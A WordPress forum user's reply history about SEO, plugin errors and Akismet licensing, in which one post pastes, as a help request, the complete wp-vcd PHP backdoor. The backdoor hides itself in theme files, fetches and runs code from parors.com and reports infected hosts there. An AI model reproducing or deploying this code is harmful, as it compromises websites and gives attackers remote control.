Forum Replies Created

Viewing 15 replies - 1 through 15 (of 40 total)
  • Respected Gioni (@gioni) sir
    i already deleted the file . And looking for permanent solution if you possible .
    Regards,
    Rahul

    ronwisely

    (@ronwisely)

    Respected Gioni (@gioni) ,
    I really appreciate the reply and thnaks for your time .No i didn’t disabled Traffic Inspector And after doing many researched i found they uploaded only one file that is wp-vcd.php in wp-include folder. At the same time in 2 different domain. Last time i remember same time was happening with my client . He was having 50+ domain and same malicious file was getting uploaded on same time on all wp-include folder .

    I am sharing the code which they uploaded on my server

    <?php
    error_reporting(0);
    //VVFU1RbJ2FjdGlvbiddKQoJCQl
    ini_set('display_errors', 0);
    //VTVFsnYWN0aW9uJ
    
    	$install_code = 'PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaF9hbGwoJy9cJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNcKCJodHRwOlwvXC8oLiopXC9jb2RlXC5waHAvaScsJGZpbGUsJG1hdGNob2xkZG9tYWluKSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRmaWxlID0gcHJlZ19yZXBsYWNlKCcvJy4kbWF0Y2hvbGRkb21haW5bMV1bMF0uJy9pJywkX1JFUVVFU1RbJ25ld2RvbWFpbiddLCAkZmlsZSk7CgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOwoJCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludCAidHJ1ZSI7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgoKCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoKCQkJCQkJCQljYXNlICdjaGFuZ2VfY29kZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJewoJCQkJCQkJCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJCQl7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpCgkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CgoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsKCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKF9fRklMRV9fLCAkZmlsZSk7CgkJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ICJ0cnVlIjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCgoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZmF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVl9DRCBXUF9DRCI7CgkJCX0KCQkJCgkJZGllKCIiKTsKCX0KCgoKCgoKCgokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOwokZnVuY2ZpbGUgICAgICA9IF9fRklMRV9fOwppZighZnVuY3Rpb25fZXhpc3RzKCd0aGVtZV90ZW1wX3NldHVwJykpIHsKICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOwogICAgaWYgKHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsKICAgICAgICAKICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQogICAgICAgIHsKICAgICAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsKICAgICAgICAgICAgJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICByZXR1cm4gJGRhdGE7CiAgICAgICAgfQogICAgICAgIAogICAgICAgIGZ1bmN0aW9uIHRoZW1lX3RlbXBfc2V0dXAoJHBocENvZGUpCiAgICAgICAgewogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsKICAgICAgICAgICAgJGhhbmRsZSAgID0gZm9wZW4oJHRtcGZuYW1lLCAidysiKTsKICAgICAgICAgICBpZiggZndyaXRlKCRoYW5kbGUsICI8P3BocFxuIiAuICRwaHBDb2RlKSkKCQkgICB7CgkJICAgfQoJCQllbHNlCgkJCXsKCQkJJHRtcGZuYW1lID0gdGVtcG5hbSgnLi8nLCAidGhlbWVfdGVtcF9zZXR1cCIpOwogICAgICAgICAgICAkaGFuZGxlICAgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOwoJCQlmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOwoJCQl9CgkJCWZjbG9zZSgkaGFuZGxlKTsKICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7CiAgICAgICAgICAgIHVubGluaygkdG1wZm5hbWUpOwogICAgICAgICAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOwogICAgICAgIH0KICAgICAgICAKCiR3cF9hdXRoX2tleT0nMTIzMzVmOGM0NWZmNzNiZTUzNjYwMWE3NTYyYTMyMjAnOwogICAgICAgIGlmICgoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cucGFyb3JzLmNvbS9jb2RlLnBocCIpIE9SICR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzX3RjdXJsKCJodHRwOi8vd3d3LnBhcm9ycy5jb20vY29kZS5waHAiKSkgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CgogICAgICAgICAgICBpZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgCiAgICAgICAgCiAgICAgICAgZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3d3dy5wYXJvcnMucHcvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfSAKCQkKCQkgICAgICAgIGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cucGFyb3JzLnRvcC9jb2RlLnBocCIpICBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UgKSB7CgppZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CgkJZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7CiAgICAgICAgICAgCiAgICAgICAgfSBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICB9Cn0KCi8vJHN0YXJ0X3dwX3RoZW1lX3RtcAoKCgovL3dwX3RtcAoKCi8vJGVuZF93cF90aGVtZV90bXAKPz4=';
    	
    	$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
    	$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
    	
    
    			$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
    				
    			$ping = true;
    				$ping2 = false;
    			if ($list = scandir( $themes ))
    				{
    					foreach ($list as $_)
    						{
    						
    							if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
    								{
    									$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
    										
    									if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
    										{
    											if (strpos($content, 'WP_V_CD') === false)
    												{
    													$content = $install_code . $content ;
    													@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
    													touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
    												}
    											else
    												{
    													$ping = false;
    												}
    										}
    										
    								}
    								
    								
    								                              else
                                                                {
                                                                $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
    					                                 foreach ($list2 as $_2)
    					                                      	{
    															
    
                                                                                        if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
    								                      {
    									$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
    										
    									if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
    										{
    											if (strpos($content, 'WP_V_CD') === false)
    												{
    													$content = $install_code . $content ;
    													@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
    													touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
    													$ping2 = true;
    												}
    
    											else
    												{
    													//$ping = false;
    												}
    										}
    										
    								}
    
                                                                                      }
    
                                                                }
    								
    								
    								
    								
    								
    								
    						}
    						
    					if ($ping) {
    						$content = @file_get_contents('http://www.parors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
    						//@file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.parors.com/admin.txt'));
    					}
    					
    															if ($ping2) {
    						$content = @file_get_contents('http://www.parors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
    						//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.parors.com/admin.txt'));
    //echo ABSPATH . 'wp-includes/class.wp.php';
    					}
    					
    					
    					
    				}
    		
    
    ?><?php error_reporting(0);?>

    I am sure bots have not done such work because i have added honey trap in wp-include folder and added disallow bots on wp-include folder
    Even i have added these 2 code on my wp-config file
    define( ‘DISALLOW_FILE_EDIT’, true );
    define( ‘DISALLOW_FILE_MODS’, true );
    And file permission of wp-login is 0000
    But still they are able to hack upload such code . May i know how i can block request should i make my file permission 444 . Its is done by hosting provider(hostgator) for making extra bucks for malware cleaning service ?

    Respected Pcosta88 (@pcosta88) ,
    This is my website robots.txt https://www.gomahamaya.com/robots.txt . i followed everything which you mentioned on the above files . Even i tried following yoast affiliate link cloaking rule https://yoast.com/cloak-affiliate-links/ But still i am getting error my website https://snag.gy/HoOguw.jpg . Even i am able to fetch data which is inside /go/ folder using this tool http://redirectcheck.com/index.php . When i check other website /go/ link then the redirect check tool failed to crawl .
    I tried almost everything to fix my error now i am tired that’s why i am asking help from SEO masters . I just need a small guidance .
    Thanks

    Respected team ,
    Sorry to disturb you again . But i need to ask you one small question . Hope team won’t mind in giving reply for this small question
    This is the screenshot of https://prnt.sc/mdkw6g webmaster blocked link .
    When trying to fetch any /go/ link https://www.gomahamaya.com/go/yoast on redirectcheck.com/index.php then it shows what is there in that blocked link . But according to robots.txt file i have blocked all bots . Still they are able to fetch data .
    But when i try other website data with link /go/ they show bots are not allowed to fetch data .
    So my question is am i doing any thing wrong in cloaking links ? do i have to add something more on my website ? Do i have to add any special header function to my website ?
    While searching on google i found this code
    $url = “//{$_SERVER[‘HTTP_HOST’]}{$_SERVER[“REQUEST_URI”]}”;
    if (preg_match(“#/go/#”, $url))
    {
    header( “X-Robots-Tag: noindex, nofollow”, true );
    header( “Cache-Control: private”, true );
    }
    Should i add above code to my website Or any special header code i have to add via .htacess file . Yoast always recommend to add header code via .htacess instead of function.php .
    So i will request you to help me on this topic . Any help will be much appreciated .
    Regards,
    Rahul

    Respected jerparx (@jerparx)
    Yes i followed everything correctly none of the bots is allowed to fetch the details inside my folder /go/ or /out/ folder but my website link they can crawled . means they can’t crawl the content or link inside that /go/ or /out/ folder . If we will add no follow to the link on post then only google will not crawl my own website link (myexample.com/go/seoplugin) . I hope i am able to convey my message to you . Sorry if my English is broken .
    So should i add no follow link to my website (myexample.com/go/seoplugin) link means no follow to myexample.com/go/seoplugin . i know we have already blocked the content inside but still google might think like he may be spamming system
    Regards,
    Rahul

    ronwisely

    (@ronwisely)

    Thanks alot for replying @jdembowski ,
    I Tagged you here because i saw you many time guiding people on WordPress what is wrong and what is correct .
    I am not blaming anyone just want to clarify about WordPress tnc i don’t have much idea about it because i have only 1 year experience in WordPress .
    Sorry to disturb both of you and thanks alot for helping me to both of you.
    Regards,
    Rahul

    ronwisely

    (@ronwisely)

    Respected csonnek ,
    As per my conclusion WordPress is open source and its plugins and should be also open source for all If you are hosting in wordpress.org . You can’t limit use of any plugin based on their source of earning . However if you want you can limit your functionality like different feature for free users and premium users . Or you can limit number spams protection per month per account for free and premium account .
    Even the people who are using adsense they are generating revenue and they fall into business license .
    Note – Respected Akismet team i am not arguing with anyone just want to clear my doubt so can you guide on this topic @jdembowski
    Regards,
    Rahul

    ronwisely

    (@ronwisely)

    Respected csonnek ,
    @csonnek Thanks alot for replying me back so fast , I think you should write this details properly

    PS: You’ll need an Akismet.com API key to use it. Keys are free for personal blogs; paid subscriptions are available for businesses and commercial sites.

    I believe almost of small affiliate bloggers are using akismet free license so small affiliate bloggers they fall into commercial site . Mostly poeple who are doing persoanl blogging are big company who is giving some service so its necessary for them to buy license again commercial sites . And good part of your tnc is ngo and educational group are also not eligible for akismet free license . because they fall into commercial site category .
    If you will see overall people using are wrongly using akismet license.
    And rarely any people do blogging without any benefit . So as per my conclusion very few people are eligible for free license . And still its their in wordpress respiratory . As per my conclusion
    Any How i am removing akismet from my blog because i got warning from your team . And i need something which is free .
    Regards,
    Rahul

    ronwisely

    (@ronwisely)

    Respected csonnek ,
    @csonnek Thanks alot for giving me answer . I asked for help . Instead of providing me help askimet team gave me a warning for up-gradation https://prnt.sc/l92qto or else my account will be suspended . I am not selling anything i am a starter blogger . Do all bloggers have to use premium version of akismet .You please clarify your tnc .
    As per i know commercial license is for the people who sells products not for affiliate Bloggers .
    Regards,
    Rahul

    Respected mam,
    I can clean my website manually in 5 minute . I have refreshed all my files and all my plugin and themes authors are elite author . No other files are getting malicious content except 3 files in my one website folder . 2 FILES are from wp-includces and one files are function.php . And that function.php is getting affect because of wp-includes of the wordpress core file that means they are able to upload files in wp-incldues . (File editing is disabled via config file )
    One strange case have seen that i have total 3 domain my cpanel in all the domain wp-includes got same malicious file and upload on the same time inside same folder . If it is done by hacker then he will atleast take some time to hack another website . is it possible to hack all the website cpanel files at the same instant . and in my cpanel last login was from mine ip .

    last time same things was happening with of my client where i did malware cleaning . Some one was able to upload the same files at same time in perticular folder in all the domain. He was also hosting with hostgator and they keeps on asking him to buy sitelock .
    Same condition is happening to my website too . Are they really a hacker or its a complete game of sitelock and hostgator.com . I am really getting doubt . Even that sitelock bots got trapped in honeypot so many time . They never obeys our robots.txt file .
    For security i am using wordfence with ithemes .htacess file and with bullet plugin htacess files . login page is disabled and protect with htacess password . All execution in upload directly are blocked . All bad request which is done by bots tracked by wordfence live tools are manually blocked by me via .htacess code . But still they can gain access it he really a hacker ?

    Really need a small guidance mam

    Regards,
    rahul

    respected sir ,
    thank you very much @futtta sir for make such a lovely update now again your plugin started working fine .
    regards,
    rahul

    respected sir ,
    contineously i am getting 2 kind of error i tried updating the api again . video is loading properly with some error in chrome console

    1. ERROR – API key not OK, your key seems to have expired, please check in the Google Developer Console.
    2. ERROR – Something went wrong, WP YouTube Lyte might not have been able to retrieve information from the YouTube API, got error: 1

    Last time it was working properly . could you please tell me how i can get rid of these error
    regards,
    rahul

    respected sir ,
    can you ask futttu sir he might be knowing the solution.
    This problem is only happening with me or with everyone because u have added xss protection header.But that api should work at-least on test .
    i am waiting eagerly for update on this plugin .

    regards,
    rahul

    respected dustin sir ,
    thanks alot for giving me reply. i am still struggling with the issue https://prnt.sc/i9m3xw image thumbnails are showing on shop page but when you open product the image link will be broken https://prnt.sc/i9m7io although i have uploaded the image kindly please look in the issue and update me
    regards,
    ron

    if you are stuck you can try deleting this plugins via cpanel for a while to make login.
    login to your cpanel and then click on public_html then click on wp-content then click on plugins and delete the uber captcha folder .if you will reinstall the plugin then it will regain its data
    regards,
    rahul

Viewing 15 replies - 1 through 15 (of 40 total)